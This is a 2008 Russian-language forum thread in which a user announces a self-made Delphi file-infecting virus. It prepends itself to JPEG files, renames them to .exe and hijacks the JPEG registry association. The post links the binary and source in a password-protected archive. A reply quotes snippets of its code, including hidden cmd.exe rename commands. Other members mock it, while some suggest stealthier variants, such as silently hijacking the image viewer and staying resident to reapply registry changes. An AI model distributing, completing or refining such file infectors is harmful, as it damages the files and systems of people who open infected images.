JPEG-вирус на Delphi
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
JPEG-вирус на Delphi - 2008-11-08 09:22:35.630000
|
|
|
Abaston
Сообщений: 5
Оценки: 0
Присоединился: 2008-07-27 07:37:07.233333
|
Вот, написал на Delphi вирус, заражающий картинки. =)
Данный вирус является первым в мире полноценным вирусом, способным
распространяться через JPEG-файлы.
При запуске он ищет в текущем каталоге все файлы, имеющие расширения *.JPE
*.JPEG *.JPG, и записывается в их начало. После чего, переименовывает
заражённые файлы в *.EXE.
При открытии заражённого файла, вирус извлекает восстановленную картинку во
временный файл, и отображает её. После того, как пользователь закроет картинку,
временный файл уничтожается.
Кроме того, вирус так изменяет системный реестр, что при открытии
любого JPEG-файла будет происходить его заражение.
Таким образом, для полного заражения системы достаточно всего лишь одного
запуска вируса на компьютере!
Вот ссылка: http://slil.ru/26313657
В архиве находится сам вирус + исходники. Пароль: virus
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 10:16:28.740000
|
|
|
progma137
Сообщений: 21
Оценки: 0
Присоединился: 2007-10-31 23:11:33.856666
|
хм. интересно.8|
проверять вроде как не стоит. т.е. стоит, но перед тем как делать ежемесячную переустановку форточки.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 11:20:56.456666
|
|
|
Sunzer
Сообщений: 253
Оценки: 31190
Присоединился: 2007-06-15 19:23:32.436666
|
Поржал
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 11:25:07.176666
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Извините за нескромный вопрос, но какой дурак будет запускать картинку с расширением exe
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 11:29:06.066666
|
|
|
_SaZ_
Сообщений: 4329
Оценки: 398
Присоединился: 2008-01-30 02:18:05.553333
|
Очень улыбнуло следущее:
--------------
//если запущен дроппер вируса, отображаем JPEG-файл
renamefile(paramstr(1),paramstr(1)+'.bmp');
--------------
shellexecute(0,'open',pchar(paramstr(1)+'.bmp'),nil,nil,sw_show);
sleep(1000);
--------------
//переименовываем все заражённые файлы в EXE
winexec(pchar('cmd.exe /c ren *.jpe *.exe'),sw_hide);
winexec(pchar('cmd.exe /c ren *.jpg *.exe'),sw_hide);
end.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 11:32:20.630000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Гы, еще и через командную строку
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 12:25:54.176666
|
|
|
Abaston
Сообщений: 5
Оценки: 0
Присоединился: 2008-07-27 07:37:07.233333
|
Но работает же. :)
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 12:39:24.426666
|
|
|
_SaZ_
Сообщений: 4329
Оценки: 398
Присоединился: 2008-01-30 02:18:05.553333
|
А толку? ;)
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 17:26:12.826666
|
|
|
Rаlf
Сообщений: 408
Оценки: 0
Присоединился: 2008-01-31 23:20:28.036666
|
молодец, лови плюсег (:
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 21:30:38.933333
|
|
|
VENOM4X
Сообщений: 246
Оценки: 0
Присоединился: 2008-02-18 22:49:08.960000
|
Смысла ноль.
Кто будет запускать файл .exe, прикидывающийся картинкой? Ну разве что поставлен чекбокс "Скрывать расширения зарегистрированных типов файлов".
Ну, а как проба пера… все с чего-то начинали.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-08 22:44:40.216666
|
|
|
progma137
Сообщений: 21
Оценки: 0
Присоединился: 2007-10-31 23:11:33.856666
|
если экзешнику прикрепить значек той открывашки которая показывает всякие графические файлы.
у меня это ACDSee
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-10 11:54:27.940000
|
|
|
Olisaff
Сообщений: 22
Оценки: 0
Присоединился: 2008-10-14 17:12:18.163333
|
А что если вирь будет ехе-шником, просто изменит в реестре прогу, через которую запускаются jpeg-файлы на себя)
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-10 14:08:29.066666
|
|
|
_SaZ_
Сообщений: 4329
Оценки: 398
Присоединился: 2008-01-30 02:18:05.553333
|
quote:
ORIGINAL: Olisaff
А что если вирь будет ехе-шником, просто изменит в реестре прогу, через которую запускаются jpeg-файлы на себя)
Некоторые просмоторщики быстро исправляют это дело ;)
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-11 17:32:55.423333
|
|
|
Olisaff
Сообщений: 22
Оценки: 0
Присоединился: 2008-10-14 17:12:18.163333
|
А что если вирь всё время запущен? И определённые промежутки времени можно всё возвращать как нам нужно)
Или делать так, чтобы открывался вирь, а потом shellexecute-ом, если в Delphi, вызывалась прога. через которую надо открывать картинку) Без палева)
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-11 17:37:49.860000
|
|
|
_SaZ_
Сообщений: 4329
Оценки: 398
Присоединился: 2008-01-30 02:18:05.553333
|
Вирь попалится, если будет часто лазить в реестр. Всё зависит от промежутков - маленькие - плохо, большие - можешь не успеть поменять ;). Да и юзер заподозрит, что что-то не так, если его прога постоянно будет пытаться переназначить расширения файлов.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-12 16:47:13.500000
|
|
|
Olisaff
Сообщений: 22
Оценки: 0
Присоединился: 2008-10-14 17:12:18.163333
|
quote:
ORIGINAL: _SaZ_
Да и юзер заподозрит, что что-то не так, если его прога постоянно будет пытаться переназначить расширения файлов.
Я имею в виду файл как был file.jpeg, так он и остаётся. Просто когда юзер его запускает, то вначале невидиммо для него запускается сам вирь, а потом уж просмотрщик. Для юзера всё выглядит как обычно - запустил картинку - открылся просмотрщик)
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-12 18:46:11.823333
|
|
|
_SaZ_
Сообщений: 4329
Оценки: 398
Присоединился: 2008-01-30 02:18:05.553333
|
quote:
ORIGINAL: Olisaff
Я имею в виду файл как был file.jpeg, так он и остаётся. Просто когда юзер его запускает, то вначале невидиммо для него запускается сам вирь, а потом уж просмотрщик. Для юзера всё выглядит как обычно - запустил картинку - открылся просмотрщик)
А я имел в виду это:
quote:
ORIGINAL: Olisaff
А что если вирь всё время запущен? И определённые промежутки времени можно всё возвращать как нам нужно)
А вообще идея не нова. Печально известная Neshta так и делает.
Но у нормальных юзеров такие финты не прокатят.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-18 05:38:12.110000
|
|
|
Zigamaker
Сообщений: 22
Оценки: 0
Присоединился: 2008-11-05 17:46:48.100000
|
Ухахаха. В палату доктор.))))) Приколу лет 300-та.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-18 15:17:28.900000
|
|
|
MEPOX
Сообщений: 868
Оценки: 0
Присоединился: 2008-03-16 10:11:26.610000
|
По-моему эту дыру залатали еще 100 лет назад..
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-18 17:12:05.540000
|
|
|
_SaZ_
Сообщений: 4329
Оценки: 398
Присоединился: 2008-01-30 02:18:05.553333
|
Я просто привёл пример.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-18 22:59:19.720000
|
|
|
TurboXaker
Сообщений: 385
Оценки: 0
Присоединился: 2008-05-23 01:05:40.516666
|
не оригинально это
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-19 00:37:11.180000
|
|
|
NetDevils
Сообщений: 149
Оценки: 0
Присоединился: 2008-08-29 16:05:45.563333
|
мда
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-22 23:29:49.400000
|
|
|
yTr42
Сообщений: 224
Оценки: 0
Присоединился: 2008-07-06 23:58:53.516666
|
quote:
вирус является первым в мире полноценным вирусом
Скромно…
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-24 12:28:25.363333
|
|
|
TESTOSTERON
Сообщений: 139
Оценки: 0
Присоединился: 2008-11-01 19:13:03.930000
|
+1 к предыдущему))
И ещё, прочитав 1 пост я был на 100% уверен, что видел его на других форумах дословно.
Возникает вопрос: КТО не пользуется копирайтом с?ки?
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-25 09:16:15.483333
|
|
|
Stil Free
Сообщений: 598
Оценки: 0
Присоединился: 2008-11-02 16:07:14.136666
|
Вот это прикольная штука… Но блин заразная!
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-25 16:51:12.710000
|
|
|
Abaston
Сообщений: 5
Оценки: 0
Присоединился: 2008-07-27 07:37:07.233333
|
quote:
ORIGINAL: TESTOSTERON
И ещё, прочитав 1 пост я был на 100% уверен, что видел его на других форумах дословно.
Возникает вопрос: КТО не пользуется копирайтом с?ки?
Я размещал этот пост ещё на нескольких форумах.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-28 10:02:24.146666
|
|
|
KaKTyC
Сообщений: 119
Оценки: 0
Присоединился: 2008-03-23 15:24:27.376666
|
Все с таких прог начинали :)
Помню еше в школе проги писал, от сути которых просто мозг разрывался, так не че, ходил гордился своими творениями.
зы Первая моя прога тупо копировалась в винду и спустя 10мин перезагружала комп :D
Однокласники меня за эти штуки любили, потомучто постоянно срывались уроки информатики.
|
|
|
|
|
RE: JPEG-вирус на Delphi - 2008-11-28 10:06:10.460000
|
|
|
KaKTyC
Сообщений: 119
Оценки: 0
Присоединился: 2008-03-23 15:24:27.376666
|
А вообше вирусы мозг развивают, не все юзеры умны и так же будут запускать Фотки с разришением ехе.
Я раньше писал вирь который распростронялся в виде папки, и нече, живет досих пор :)
А вообше автору "+" за прикольную идею, хотя код я считаю богохульством по отношению к делфе :)
|
|
|
|
|
|
